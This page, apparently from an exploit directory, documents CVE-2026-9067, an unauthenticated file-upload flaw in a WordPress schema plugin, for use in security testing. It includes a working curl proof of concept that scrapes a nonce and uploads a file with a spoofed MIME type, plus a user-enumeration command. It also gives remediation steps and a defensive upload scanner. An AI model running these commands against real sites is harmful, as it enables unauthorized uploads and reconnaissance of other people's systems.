## https://sploitus.com/exploit?id=642054C4-1CED-5BD6-887A-6F06F63071F5
# POC & Xploit - Proof of Concept Directory

Documentation and exploits for vulnerabilities found in a WordPress security-testing environment.

---

## Vulnerability List

| CVE ID | Plugin | Severity | Type | Status |
|--------|--------|----------|------|--------|
| [CVE-2026-9067](./CVE-2026-9067.md) | Schema & Structured Data for WP & AMP | High (8.1) | Unrestricted File Upload | Documented |

---

## CVE-2026-9067

### Quick Summary

| Field | Value |
|-------|-------|
| **CVE ID** | CVE-2026-9067 |
| **Plugin** | Schema & Structured Data for WP & AMP |
| **Affected Versions** | < 1.60 |
| **CWE** | CWE-434 (Unrestricted Upload of File with Dangerous Type) |
| **CVSS v3.1** | 8.1 (High) |
| **Finder** | 0xBassia |

### Vulnerability Description

The Schema & Structured Data for WP & AMP plugin before version 1.60 does not check user capabilities in its file-upload AJAX handlers and does not validate the type of the uploaded file. This allows an unauthenticated attacker to upload arbitrary files.

### Impact

- **Content Hosting**: an attacker can host malicious content on the victim's domain
- **Disk Consumption**: arbitrary file uploads can exhaust disk space
- **Reputation Abuse**: distribution of malware or phishing pages from the victim's domain

**Important note**: WordPress core blocks executable file types (`.php`, `.phtml`, `.html`, `.svg`), so **there is no direct RCE path** from this vulnerability.

### Files

```
CVE-2026-9067/
├── CVE-2026-9067.md          # Full documentation (this file)
├── CVE-2026-9067.py          # Python exploit with multi-threading
├── CVE-2026-9067.sh          # Bash/Shell PoC script
└── CVE-2026-9067_exploit.sh  # Alternative Bash PoC
```

### Quick PoC

```bash
# Step 1: Get nonce
NONCE=$(curl -s "https://yorbit7.ddev.site/" | grep -oP 'saswp_rf_(page_)?security_nonce["\x27]?\s*:\s*["\']([a-f0-9]{10})["\']' | grep -oP '[a-f0-9]{10}' | head -1)

# Step 2: Upload arbitrary file
curl -X POST 'https://yorbit7.ddev.site/wp-admin/admin-ajax.php' \
  -F 'action=saswp_rf_form_image_upload' \
  -F "saswp_rf_form_nonce=$NONCE" \
  -F 'saswp-rf-form-image=@evil.csv;type=image/png;filename=evil.csv'

# Step 3: Access uploaded file
curl -s "https://yorbit7.ddev.site/wp-content/uploads/$(date +%Y)/$(date +%m)/evil.csv"
```

---

## Environment Information

| Field | Value |
|-------|-------|
| **Target URL** | https://yorbit7.ddev.site |
| **PHP Version** | 8.4 |
| **Database** | MariaDB 11.8 |
| **WordPress Version** | 7.0 |
| **Testing Method** | curl-based (black-box testing) |

---

## Testing Commands

### Check Site Status
```bash
curl -s -o /dev/null -w "%{http_code}" https://yorbit7.ddev.site
```

### Check Plugin Version
```bash
curl -s https://yorbit7.ddev.site/wp-content/plugins/schema-and-structured-data-for-wp/readme.txt | grep -i "Stable tag:"
```

### Enumerate Users
```bash
curl -s https://yorbit7.ddev.site/wp-json/wp/v2/users | jq '.[] | {id, name, slug}'
```

---

## Remediation

1. **Upgrade Plugin**: update Schema & Structured Data for WP & AMP to version 1.60 or later
2. **Disable Plugin**: if upgrading is not possible, deactivate the plugin
3. **Hardening**:
   - Set the `DISALLOW_FILE_MODS` constant
   - Disable PHP execution in the uploads directory via `.htaccess`
   - Implement WAF rules
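The description above says the handler accepted a file without validating its type, and the PoC relies on that by sending a `.csv` with a declared `image/png` MIME type. The following is an added example, not the plugin's code or the PoC author's: it models the content validation an image-upload handler should perform (an extension allowlist plus a magic-byte check, ignoring the attacker-controlled MIME field) and reuses it as a scanner over an existing `wp-content/uploads` tree, so a defender can find files that would have failed such a check. The allowlist and the sample files are assumptions constructed for the example.

```python
"""Upload validation of the kind the vulnerable handler lacked (added example,
not the plugin's code), plus a scanner for an existing uploads directory."""
import os
import tempfile

# Assumption: this hypothetical image form should only ever accept these types.
ALLOWED_EXTENSIONS = {"png", "jpg", "jpeg", "gif", "webp"}


def sniff_type(data):
    """Return the image type implied by the file's leading bytes, or None."""
    if data.startswith(b"\x89PNG\r\n\x1a\n"):
        return "png"
    if data.startswith(b"\xff\xd8\xff"):
        return "jpeg"
    if data[:6] in (b"GIF87a", b"GIF89a"):
        return "gif"
    if data[:4] == b"RIFF" and data[8:12] == b"WEBP":
        return "webp"
    return None


def validate_upload(filename, data, declared_mime=None):
    """Decide whether an upload is acceptable; returns (ok, reason).

    The declared MIME type is deliberately not used for the decision: it is
    client-controlled (the PoC sends type=image/png with a .csv filename), so
    only the extension and the actual bytes count.
    """
    ext = os.path.splitext(filename)[1].lower().lstrip(".")
    if ext not in ALLOWED_EXTENSIONS:
        return False, f"extension '.{ext}' is not in the allowlist"
    sniffed = sniff_type(data)
    if sniffed is None:
        return False, "content does not match any allowed image type"
    normalized = "jpeg" if ext == "jpg" else ext
    if sniffed != normalized:
        return False, f"extension .{ext} but content looks like {sniffed}"
    return True, "ok"


def scan_uploads(root):
    """Walk an uploads tree and report files that fail validate_upload."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                head = fh.read(16)  # magic bytes live in the first 12 bytes
            ok, reason = validate_upload(name, head)
            if not ok:
                findings.append((os.path.relpath(path, root), reason))
    return sorted(findings)


def demo():
    """Build a constructed uploads tree (year/month layout) and scan it."""
    with tempfile.TemporaryDirectory() as root:
        month = os.path.join(root, "2026", "03")
        os.makedirs(month)
        samples = {  # constructed sample files
            "logo.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 32,   # legitimate
            "evil.csv": b"name,payload\nfoo,bar\n",             # like the PoC
            "photo.jpg": b"\x89PNG\r\n\x1a\n" + b"\x00" * 32,  # PNG bytes, .jpg name
        }
        for name, data in samples.items():
            with open(os.path.join(month, name), "wb") as fh:
                fh.write(data)
        return scan_uploads(root)


if __name__ == "__main__":
    for path, reason in demo():
        print(f"{path}: {reason}")
```

Run it against a real uploads directory with `scan_uploads("/path/to/wp-content/uploads")`; anything it reports is a candidate for the disk-consumption and content-hosting abuse listed under Impact, and the `validate_upload` logic is the shape of check that a fixed handler enforces before calling the WordPress upload routines.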

---

## References

- [NVD CVE-2026-9067](https://nvd.nist.gov/vuln/detail/CVE-2026-9067)
- [WPScan Vulnerability Database](https://wpscan.com/vulnerability/7fac98eb-f82c-4705-a956-aba650945826/)
- [WordPress Plugin Page](https://wordpress.org/plugins/schema-and-structured-data-for-wp/)
- [Original Researcher: 0xBassia](https://github.com/0xBassia)